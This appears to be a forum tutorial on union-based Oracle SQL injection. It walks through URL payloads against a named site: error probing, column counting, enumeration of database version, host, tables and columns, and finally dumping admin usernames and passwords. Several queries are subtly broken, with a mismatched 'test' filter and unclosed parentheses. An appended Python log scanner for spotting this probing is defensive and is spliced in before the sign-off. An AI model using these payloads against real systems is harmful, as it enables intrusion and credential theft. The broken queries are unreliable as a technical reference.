Oracle SQL Injection (union based)

Hello dear visitors, I hope that you are fine :)

Let's start with this example (just an example :D):
http://votrecodeur.com/
Try every bad character, like: '
http://votrecodeur.com/index.php?id=1'

You should get an error (Warning: ociexecute():).
OK? Good. Let's send a request with ORDER BY for each column number:

index.php?id=1 order by 1 ok
index.php?id=1 order by 2-- ok
index.php?id=1 order by 3-- ok
index.php?id=1 order by 4-- error

So what?
Simply, we have three columns!
index.php?id=1 union select 1,2,3--
index.php?id=1 union select 1,2,3

Error? Great :)
Let's try null:
index.php?id=1 union select null,null,null

Error? Again? Yes, yes... that's what we want ;)

Try converting a number to a character in one column, then complete your query with: from dual :

index.php?id=1 union select to_char(546),null,null  from dual
No? Then convert in the second column, then the next... until the number you converted gets printed :)

Then we try to get the DB version:
index.php?id=1 union select null,version,null  from v$instance

Try to get the DB name:
index.php?id=1 union select null,name,null  from v$database

Is it OK? Good... maybe we need the hostname too:
index.php?id=1 union select null,host_name,null  from v$instance

Like that you can continue and get all the information you need...

- A table that has a column named password, for example :)
index.php?id=1 union select null,table_name,null from+all_tab_columns WHERE COLUMN_name='PASSWORD'

- Go through the table names one by one: where test=1, test=2, test=3, etc.
index.php?id=1 union select null,table_name,null from (select ROWNUM r,table_name from all_tables order by table_name) where test=1

Maybe you need to hex it ;)
index.php?id=1 union select  null,rawtohex(table_name),null from (select ROWNUM r,table_name from all_tables  order by table_name) where test=1

Now, try to get the column info :)
index.php?id=1 union select  null,column_name,null from (select ROWNUM r,column_name from all_tab_columns where table_name= CHR(50) || CHR(75) || CHR(98) where test=1


You can iterate with "test": test=1, test=2, test=3... etc.


Note: (CHR(50) || CHR(75) || CHR(98)) is just an example :)

Do you want to try hex?
OK, take:
index.php?id=1 union select  null,rawtohex(column_name),null from (select ROWNUM r,column_name from all_tab_columns where table_name= CHR(50) || CHR(75) || CHR(98) where test=1

At this point we have the target table and the target columns... what do we need?
Just this:
index.php?id=1 union select  null,rawtohex(admin||chr(58)||pass),null from admin_users
You will get the info in hex... try to unhex it :)
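As an added defender-side example (not part of the original post), here is a Python scanner that flags the probing sequence above in web server access logs: the bare quote that triggers the ociexecute() warning, the ORDER BY column counting, and the UNION SELECT queries against v$instance, v$database, all_tables and all_tab_columns. The log lines, IPs and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the probing sequence, matched on the URL-decoded request target (rule names are ours).
RULES = [
    ("quote_probe", re.compile(r"\bid=\d+'")),                       # bare ' to force an OCI error
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),      # column counting
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("oracle_dual", re.compile(r"\bfrom\s+dual\b", re.I)),
    ("oracle_sysviews", re.compile(r"\bv\$(instance|database|version)\b", re.I)),
    ("oracle_catalog", re.compile(r"\ball_(tables|tab_columns)\b", re.I)),
    ("oracle_encoding", re.compile(r"\b(rawtohex|to_char|chr)\s*\(", re.I)),
    ("rownum_paging", re.compile(r"\brownum\b", re.I)),
]

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample traffic (documentation IPs, not real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1' HTTP/1.1" 500 88
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20order%20by%204-- HTTP/1.1" 500 88
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20union%20select%20null,version,null%20from%20v$instance HTTP/1.1" 200 530
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1+union+select+null,rawtohex(table_name),null+from+(select+ROWNUM+r,table_name+from+all_tables) HTTP/1.1" 200 540
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=2 HTTP/1.1" 200 498
"""

def classify_request(target):
    """Return the rule names matched by one request target after URL decoding."""
    decoded = unquote_plus(target)  # %20 and '+' both hide the keywords from naive matching
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """One finding per log line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify_request(m["target"])):
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "target": m["target"], "rules": hits})
    return findings

def suspicious_sources(findings, min_distinct_rules=2):
    """IPs whose requests trip several distinct rules: the error probe, ORDER BY,
    UNION SELECT progression rather than one stray keyword in a legitimate URL."""
    per_ip = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).update(f["rules"])
    return {ip: sorted(r) for ip, r in per_ip.items() if len(r) >= min_distinct_rules}
```

Requiring several distinct rules per source keeps a single word like "order" in a normal query string from raising an alert, while the stepwise enumeration this post describes trips most of them from one address.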

Good luck :)
By Drupal Study